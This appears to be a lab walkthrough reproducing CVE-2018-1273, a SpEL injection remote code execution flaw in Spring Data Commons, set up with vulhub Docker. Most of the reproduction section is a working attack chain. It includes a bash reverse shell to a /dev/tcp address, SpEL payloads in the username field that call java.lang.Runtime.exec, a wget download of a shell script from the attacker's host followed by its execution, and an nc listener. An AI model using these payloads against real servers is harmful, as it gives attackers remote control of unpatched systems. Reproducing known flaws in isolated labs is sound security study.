1. Vulnerability Description
Spring Data is an open source framework used to simplify database access and support cloud services. It includes Commons, Gemfire, JPA, JDBC, MongoDB and other modules. This vulnerability occurs in the Spring Data Commons component, which provides a shared basic framework, is suitable for use by various sub-projects, and supports cross-database persistence.
There is a remote code execution vulnerability in the Spring Data Commons component. An attacker can construct a SPEL expression containing malicious code to implement remote code attacks and directly obtain server control permissions.
2. Affected versions
Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)
3. Set up the environment
cd vulhub/spring/CVE-2018-1273
docker-compose up -d
4. Vulnerability Reproduction
1. Prepare the shell command
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
to write the file shell.sh
2. Enable the http service.
Enable the http service in the directory where the sh file is located
. python -m http.server 8081
3. Capture packets
: visit http://192.168.25.128:8080/users, register, and BP capture packets
4. Prepare the request package
Payload:
username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“[Command to be executed]”)]=&password=&repeatedPassword=Download
file Request package: username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168. 155.2:8081/shell.sh”)]&password=test&repeatedPassword=test
Execute command request package:
username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/bin/ bash /tmp/1.sh”)]&password=test&repeatedPassword=test
5.nc turns on monitoring
6. Send request package
Send download package
Found that 1.sh appeared in tmp
Send execution package
7. Rebound shell
Note:
Correct usage of wget:
Use the -O option to save the downloaded file under another name
wget -O /usr/software https://download.redis.io/releases/redis-6.0.8.tar.gz